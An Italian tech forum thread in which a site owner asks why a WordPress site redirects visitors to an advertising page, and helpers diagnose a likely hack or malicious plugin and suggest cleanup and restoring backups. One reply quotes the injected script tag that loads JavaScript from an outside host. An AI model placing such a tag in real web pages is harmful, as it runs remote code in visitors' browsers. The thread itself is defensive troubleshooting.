PROBLEMA Reindirizzamento sito

peppepizz

Nuovo Utente
3
0
Ho un problema con il mio sito web. Quando chiunque apre il mio sito web viene automaticamente reindirizzato a una pagina web di pubblicità. Non riesco a capire come risolvere. Il sito è stato creato con WordPress e riesco ad accedere alla pagina di gestione ma non riesco a trovare soluzione.
 

Andreagamer1999

CAR GUY
Utente Èlite
6,690
2,471
CPU
Core 2 duo e6600
Dissipatore
CoolerMaster
Scheda Madre
Intel
HDD
240gb Kingston / 240gb hdd maxtor
RAM
4gb DDR2 667mhz
GPU
GTX 660 palit
Audio
Integrata
Monitor
1080p 60hz
PSU
650w
OS
Windows 7
Ciao
perché hai aperto 2 discussioni che parlano dello stesso argomento ?
Purtroppo non me ne intendo dell argomento in questione :(
 

StarSouls08

Utente Attivo
1,374
557
CPU
Ryzen 3 1200
Scheda Madre
Gigabyte b450 aorus elite
HDD
ssd crucial 512gb
RAM
4x2 hyperX
GPU
gtx 950
Audio
m-audio
Monitor
BenQ GL2480
PSU
Kolink 600w 80 plus bronze semi-modulare
Case
Gamemax Expedition
Periferiche
razer deathadder essential, tronsmart tk09r meccanica RGB
Net
vodafone
OS
windows 10 pro
  • Mi piace
Reazioni: peppepizz

Andreagamer1999

CAR GUY
Utente Èlite
6,690
2,471
CPU
Core 2 duo e6600
Dissipatore
CoolerMaster
Scheda Madre
Intel
HDD
240gb Kingston / 240gb hdd maxtor
RAM
4gb DDR2 667mhz
GPU
GTX 660 palit
Audio
Integrata
Monitor
1080p 60hz
PSU
650w
OS
Windows 7

Neapolale

Utente Attivo
1,169
553
CPU
5600x
GPU
1650super
difficile capire così, senza un link. Cmq in generale, a meno che tu non abbia inserito nell'header degli script particolari (nel caso prova a rimuoverli) o dei plugin di wordpress malevoli (nel caso disinstallali), mi sa che ti hanno hackerato.
Il problema si può risolvere chiedendo all'assistenza del tuo hosting, oppure mettendo una versione di backup (che spero tu abbia fatto) del tuo database cambiandogli però la password (altrimenti stai punto e a capo).

Extrema ratio, cancelli database e wordpress e reinstalli tutto.

Se è davvero un hacking, è probabilmente dovuto al mancato aggiornamento di wordpress che deve essere costante e puntuale. Il problema degli open source è quello, i bug, le vulnerabilità sono pubblici. Questo aiuta la community a lavorarci su più rapidamente, ma aiuta anche gli hacker.
 

peppepizz

Nuovo Utente
3
0
difficile capire così, senza un link. Cmq in generale, a meno che tu non abbia inserito nell'header degli script particolari (nel caso prova a rimuoverli) o dei plugin di wordpress malevoli (nel caso disinstallali), mi sa che ti hanno hackerato.
Il problema si può risolvere chiedendo all'assistenza del tuo hosting, oppure mettendo una versione di backup (che spero tu abbia fatto) del tuo database cambiandogli però la password (altrimenti stai punto e a capo).

Extrema ratio, cancelli database e wordpress e reinstalli tutto.

Se è davvero un hacking, è probabilmente dovuto al mancato aggiornamento di wordpress che deve essere costante e puntuale. Il problema degli open source è quello, i bug, le vulnerabilità sono pubblici. Questo aiuta la community a lavorarci su più rapidamente, ma aiuta anche gli hacker.
Grazie mille, ora provo a seguire il tuo suggerimento, se vuoi dare una maggiore occhiata, il link del sito è il seguente:
www.lesgriffesstore.com
 
Ultima modifica da un moderatore:

Neapolale

Utente Attivo
1,169
553
CPU
5600x
GPU
1650super
1589113361325.png
Post unito automaticamente:

se l'antivirus non ti ha bloccato l'accesso al sito, ti consiglio di fare una bella pulizia che quasi sicuramente ti sei ciucciato un po' di schifezze.
Post unito automaticamente:

ok, il problema credo sia questo
Codice:
<script async="" src="https://tom.verybeatifulantony.com/hjsers.js" type="text/javascript"></script>
Post unito automaticamente:

al 99% è un plugin. Non so dirti quale ovviamente, ma una volta rimosso quello puoi passare alla pulizia del sito (inutile farla prima perché il plugin ti rimetterebbe tutto).
Spero tu abbia dei backup non infetti, perché questo codice malevole probabilmente è presente in più parti del codice wordpress.
Qui trovi maggiori info su cosa cercare nel tuo codice.
 
Ultima modifica:

Entra

oppure Accedi utilizzando
Discord Ufficiale Entra ora!

Discussioni Simili